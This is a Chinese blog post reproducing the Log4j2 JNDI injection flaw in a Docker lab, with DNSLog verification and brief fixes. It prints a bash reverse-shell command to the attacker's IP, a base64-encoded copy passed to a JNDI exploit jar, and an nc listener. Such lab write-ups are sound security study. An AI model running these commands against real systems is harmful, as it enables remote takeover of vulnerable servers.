log4j2复现

最新推荐文章于 2024-07-12 15:51:39 发布
最新推荐文章于 2024-07-12 15:51:39 发布
阅读量485 收藏 1
点赞数
文章标签: java apache 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65219040/article/details/125345861
版权

目录

环境搭建

log4j2 DNSLog测试

JNDI注入反弹shell

环境搭建

靶机:Ubuntu  5.4.0-117-generic   192.168.6.183
攻击机:Kali  5.16.0-kali7-amd64  192.168.6.212

靶机:
#首先拉一个docker镜像
docker pull vulfocus/vulfocus
#查看镜像
docker images
#启动
docker run -d -p 8081:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=172.16.124.129 vulfocus/vulfocus

浏览器中访问目标IP的8081端口: 

查看镜像,将log4j漏洞的镜像拉取下来:

log4j2 DNSLog测试

在首页启动log4j2镜像:

访问此地址:

 

 进行DNSLog验证:点击get subdomain得到一个dns:72lrrx.dnslog.cn

使用bp对http://172.16.124.129:60067/页面抓包:

 修改参数:

 

发到reperter模块查看:

 

 

放包:

 

查看DNSLog页面,点击Refresh Record:

 DNSLog网站收到解析记录,说明这里有log4j2漏洞。

JNDI注入反弹shell

利用JNDI注入工具在攻击机上开启JNDI服务器,在攻击机Kali中安装:

git clone https://github.com/sayers522/JNDI-Injection-Exploit.git

进入目录,使用mvn工具打包:

#未进行安装的话,安装mvn
apt install maven -y
#打包
mvn clean package -DskipTests

会生成一个target文件夹:

 生成payload:

bash -i >& /dev/tcp/192.168.6.212/1234 0>&1

将其进行base64编码:

 

#生成payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjYuMjEyLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.6.212"

反弹shell:
监听端口1234:
nc -lvvp 1234

 将payload进行url编码:

 

放包,看是否反弹:

反弹成功。

修复方案

升级到最新版本

在WAF中配置规则,阻断攻击性输入

攻击字符串得特性是 ${jndi:schema://url},通过正则表达式进行匹配,阻断带有上述特征的请求即可。因为应用系统的多样性等原因,直接WAF阻断存在干扰正常业务功能的风险。

 

young lady
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Log4j2 漏洞检测工具清单
01-17 1万+
距离Log4j2漏洞公开已经过去一个月了,它所造成的严重影响已经不需要我们重复提及了。随着时间的推移,新的漏洞会不断出现,旧的漏洞会不断消失,而这个Log4j2中的RCE漏洞可能需要好几年...
Log4j2漏洞复现
weixin_51519028的博客
08-12 1万+
Apache Log4j2Apache软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的重写,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能而被广泛的应用于各种常见的 Web 服务中。2021 年 12 月 9 日晚,Log4j2 的一个远程代码执行漏洞的利用细节被公开。攻击者使用${}......
log4j2漏洞简单复现
BING
06-06 3004
log4j2漏洞简单复现
log4j2漏洞复现与利用】
热门推荐
一个程序员
01-31 4万+
log4j2
Log4j2漏洞(一)原理和dnslog验证
02-06 1720
Log4j2漏洞(一)介绍漏洞前景、漏洞原理、确定注入点和dnslog验证
Log4j2 反序列化漏洞原理与复现
FisrtBqy的博客
05-15 4012
Log4j2 RCE漏洞原理与复现
log4j2漏洞复现
qq_17622203的博客
03-21 3247
参考链接 Apache Log4j2 远程代码执行漏洞 - xuzhujack - 博客园 CVE-2021-44228——Vulfocus-Log4j RCE漏洞复现_网络¥安全联盟站的博客-CSDN博客 工具链接 DNSLog Platform https://github.com/welk1n/JNDI-Injection-Exploit/releases https://www.jackson-t.ca/runtime-exec-payloads.html 此次漏洞的出现,正是由用于
log4j和log4j2
hustzw07的博客
03-28 1485
log4j log4j是之前最流行的日志输出系统,目前尽管有了log4j2和其他日志输出系统。但log4j 里面的概念还是保留了。 先看个例子: 这里我使用的是 slf4 => log4j,依赖: dependencies { compile "org.slf4j:slf4j-api:1.7.30" compile "org.slf4j:slf4j-log4j12:...
log4j2_rce 项目
02-23
《深入理解Log4j2 RCE漏洞:从概念到实战》 在信息技术领域,安全问题始终是关注的焦点。本文将深入探讨一个重要的安全漏洞——Log4j2远程代码执行(RCE)漏洞,该漏洞曾引起全球广泛关注。我们将从项目标题"Log4j2...
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
04-14 2万+
本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。
[Java安全]—log4j2 rce复现
Sentiment的博客
07-09 1171
自漏洞爆出已经半年多了,可当时还是个java啥都不懂的菜鸡所以也没能及时复现,现在捡起来复现下21年席卷整个安全圈的log4j2漏洞log4j 是 javaweb 的日志组件,用来记录 web日志 去指定下载文件的url 在搜索框或者搜索的 url 里面加上${jndi:ldap://127.0.0.1/test} ,log4j 会对这串代码进行表达式解析,给 lookup 传递一个恶意的参数指定,参数指的是比如 ldap 不存在的资源 $ 是会被直接执行的。后面再去指定下载文件的 url,去下载我们的恶意
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
今天是几号的博客
04-12 2630
Apache log4j是Apache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
【网络安全---漏洞复现log4j2漏洞详细的复现和利用过程(CVE-2021-44228)
m0_67844671的博客
09-10 1872
Log4j2远程代码执行漏洞复现(cve-2021-44228),漏洞复现详细过程,cve-2021-44228,Log4j2
Apache Log4j2(远程代码执行漏洞)
F2444790591的博客
07-08 7902
1、下载、解压、重命名vulhub-master.zip为vulhub 2、进入漏洞环境下,启动该环境。 3、访问目标靶场: 4、在Dnslog.cn中生成接收信息的域名 。 5、提交dnslog payload 参数,进行访问。 6、可以发现dnslog接收到返回的信息,证明存在log4
java版的上门家政系统和PHP版的上门家政有什么区别?
最新发布
baina666的博客
07-12 613
综上所述,Java版和PHP版的上门家政系统各有优缺点,选择哪种语言主要取决于项目的具体需求、预算、开发团队的技术栈以及未来的扩展计划等因素。同时,由于Java生态系统的复杂性和多样性,也可能需要投入更多的时间和资源来学习和掌握相关的技术和工具。Java版:Java拥有庞大的生态系统和丰富的第三方库,这为家政系统的开发和扩展提供了强大的支持。Java版:由于Java的编译执行机制和高效的垃圾回收算法,Java版家政系统通常具有更高的运行效率和更好的性能表现,尤其是在处理高并发、大数据量等复杂场景时。
log4j2漏洞在线复现
10-05
要在线复现log4j2漏洞,您可以按照以下步骤进行操作: 1. 编写一个Java类,包含恶意代码,例如上述提供的POC。 2. 确保您的Java环境中安装了受漏洞影响的log4j2版本。 3. 运行该Java类,并触发日志记录操作。 4. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值